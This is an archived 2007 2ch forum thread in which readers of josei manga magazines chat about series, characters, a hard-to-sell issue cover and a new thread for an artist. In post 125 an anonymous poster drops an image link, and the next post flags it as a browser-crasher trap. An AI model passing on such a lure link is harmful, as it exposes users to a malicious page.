121 :花と名無しさん:2007/01/22(月) 21:17:15 ID:???0
>>119
ひろゆきに頼めば?w

122 :花と名無しさん:2007/01/22(月) 21:48:42 ID:???0
保育園の漫画(ちゅーりっぷ?)は全6回だそうですね
本人のサイトに書いてありました

ざっとサイトを見ましたが
新しい世界を見てしまった気がorz

123 :117:2007/01/22(月) 22:00:48 ID:???0
>>120
なるほどw thx


124 :花と名無しさん:2007/01/22(月) 22:29:29 ID:???O
モンの先生は、大門に対して憧れと嫉妬が入り混じったドロドロ感情抱えてそう。
だから大門の物が欲しくなっちゃう病気なんじゃないだろうか。
雪はこのままFOしそうだね。

しかし大門がかなり筋の通ったキャラで好感度うなぎ登り。


125 :花と名無しさん:2007/01/22(月) 23:57:26 ID:???0
>>108
ttp://strawberry.web-sv.com:900/Sn/5/iuy/bh7995.jpg

126 :花と名無しさん:2007/01/23(火) 09:31:33 ID:???0
>>125
ブラクラ

127 :花と名無しさん:2007/01/23(火) 11:00:21 ID:???0
>>122
本当何がどうなってYOUとか縁遠い場所に来たんだろうか…

128 :花と名無しさん:2007/01/23(火) 15:55:37 ID:???0
>>119
その手の要望は運営板辺りでドゾー。
でも、まずこの板の中にある自治スレで、今の2xhの仕様では
新板じゃない場合、基本的に無理との結論が出ているので
まず読んでみて。

129 :花と名無しさん:2007/01/23(火) 16:13:09 ID:???0
うちの近くのコンビニ、今号は異様に残ってる。
いつも発売日の早朝に入って、一冊残るか残らないかぐらいなのに。
あの表紙は買いづらいのかな。

130 :花と名無しさん:2007/01/23(火) 16:22:33 ID:???0
笑ってない目がキモイと思う

131 :花と名無しさん:2007/01/23(火) 17:00:11 ID:???0
そういえば、うちの近所の本屋も残ってたなあ。
いつもは2.3日で無くなってるから、
入荷数が増えたのかなって考えてたよ。

132 :花と名無しさん:2007/01/23(火) 17:08:57 ID:???O
オフィスユーの「斎藤さん」良かった。
最近多い自分の子を見てない親や教育熱心だけど、躾ができてない子を描いてくれてる。
来月斎藤さんがバカ親にガツンと言ってくれるんだろうな。wktk

133 :花と名無しさん:2007/01/23(火) 21:52:56 ID:???0
>>130
はなまるのやっくんを思い出すよw
顔でどんなに笑っていても、目だけが冷めている

134 :花と名無しさん:2007/01/23(火) 22:56:10 ID:???0
空気読まずに報告のみ…長浜さんの専スレが立ってた。

長浜幸子【修羅の棺】
http://comic7.2ch.net/test/read.cgi/gcomic/1169525915/

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)